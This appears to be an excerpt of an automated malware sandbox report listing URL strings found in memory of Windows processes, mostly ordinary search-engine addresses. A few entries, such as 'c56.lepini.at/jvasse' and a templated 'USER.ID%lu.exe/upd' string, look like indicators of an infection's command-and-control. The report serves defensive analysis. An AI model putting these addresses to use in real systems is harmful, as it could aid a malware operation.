Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000017.00000000.860723524.0000000011ADC000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvasse
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000010.00000003.1052476041.000001895DA8A000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: de-ch[1].htm.4.dr String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr String found in binary or memory: http://ogp.me/ns/fb#
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: auction[1].htm.4.dr String found in binary or memory: http://popup.taboola.com/german
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000017.00000000.841938977.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.3.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
